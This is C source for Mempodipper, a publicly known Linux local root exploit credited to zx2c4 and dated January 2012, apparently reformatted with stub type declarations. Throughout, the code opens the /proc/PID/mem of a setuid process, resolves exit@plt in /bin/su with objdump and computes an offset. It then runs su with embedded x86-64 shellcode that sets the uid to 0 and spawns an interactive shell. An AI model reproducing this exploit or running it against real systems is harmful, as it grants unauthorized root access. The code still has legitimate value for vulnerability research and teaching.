
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int FILE ;


 int O_RDWR ;
 int SEEK_SET ;
 unsigned long ULONG_MAX ;
 int dup2 (int,int) ;
 int execl (char*,char*,char*,char*,...) ;
 int fgets (char*,int,int *) ;
 scalar_t__ fork () ;
 int getpid () ;
 int lseek64 (int,unsigned long,int ) ;
 int open (char*,int ) ;
 int pclose (int *) ;
 int perror (char*) ;
 int * popen (char*,char*) ;
 int printf (char*,...) ;
 int recv_fd () ;
 int send_fd (int) ;
 int sprintf (char*,char*,...) ;
 char* strstr (char*,char*) ;
 unsigned long strtoul (char*,int *,int) ;

int main(int argc, char **argv)
{
 if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') {
  char parent_mem[256];
  sprintf(parent_mem, "/proc/%s/mem", argv[2]);
  printf("[+] Opening parent mem %s in child.\n", parent_mem);
  int fd = open(parent_mem, O_RDWR);
  if (fd < 0) {
   perror("[-] open");
   return 1;
  }
  printf("[+] Sending fd %d to parent.\n", fd);
  send_fd(fd);
  return 0;
 }

 printf("===============================\n");
 printf("=          Mempodipper        =\n");
 printf("=           by zx2c4          =\n");
 printf("=         Jan 21, 2012        =\n");
 printf("===============================\n\n");

 int parent_pid = getpid();
 if (fork()) {
  printf("[+] Waiting for transferred fd in parent.\n");
  int fd = recv_fd();
  printf("[+] Received fd at %d.\n", fd);
  if (fd < 0) {
   perror("[-] recv_fd");
   return -1;
  }
  printf("[+] Assigning fd %d to stderr.\n", fd);
  dup2(2, 6);
  dup2(fd, 2);

  unsigned long address;
  if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
   address = strtoul(argv[2], ((void*)0), 16);
  else {
   printf("[+] Reading su for exit@plt.\n");

   FILE *command = popen("objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
   char result[32];
   result[0] = 0;
   fgets(result, 32, command);
   pclose(command);
   address = strtoul(result, ((void*)0), 16);
   if (address == ULONG_MAX || !address) {
    printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
    printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", argv[0], argv[0]);
    return 1;
   }
   printf("[+] Resolved exit@plt to 0x%lx.\n", address);
  }
  printf("[+] Calculating su padding.\n");
  FILE *command = popen("su this-user-does-not-exist 2>&1", "r");
  char result[256];
  result[0] = 0;
  fgets(result, 256, command);
  pclose(command);
  unsigned long su_padding = (strstr(result, "this-user-does-not-exist") - result) / sizeof(char);
  unsigned long offset = address - su_padding;
  printf("[+] Seeking to offset 0x%lx.\n", offset);
  lseek64(fd, offset, SEEK_SET);
  char shellcode[] =
   "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
   "\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
   "\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
   "\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
   "\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";




  printf("[+] Executing su with shellcode.\n");
  execl("/bin/su", "su", shellcode, ((void*)0));
 } else {
  char pid[32];
  sprintf(pid, "%d", parent_pid);
  printf("[+] Executing child from child fork.\n");
  execl("/proc/self/exe", argv[0], "-c", pid, ((void*)0));
 }
}
